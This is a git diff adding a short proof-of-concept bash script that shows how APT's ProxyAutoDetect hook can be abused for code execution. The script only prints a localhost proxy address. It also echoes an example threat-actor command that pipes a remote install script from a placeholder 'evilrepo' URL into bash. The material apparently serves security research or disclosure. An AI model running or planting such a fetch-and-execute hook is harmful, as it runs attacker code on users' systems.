first commit

poc/detect-http-proxy

@@ -0,0 +1,10 @@
+#!/bin/bash
+
+# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
+# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
+
+echo "http://127.0.0.1:8888"  # stdout is interpreted as the proxy address
+
+# Simulated threat actor behavior
+echo "If I was a threat actor, I might do something like:" >&2
+echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2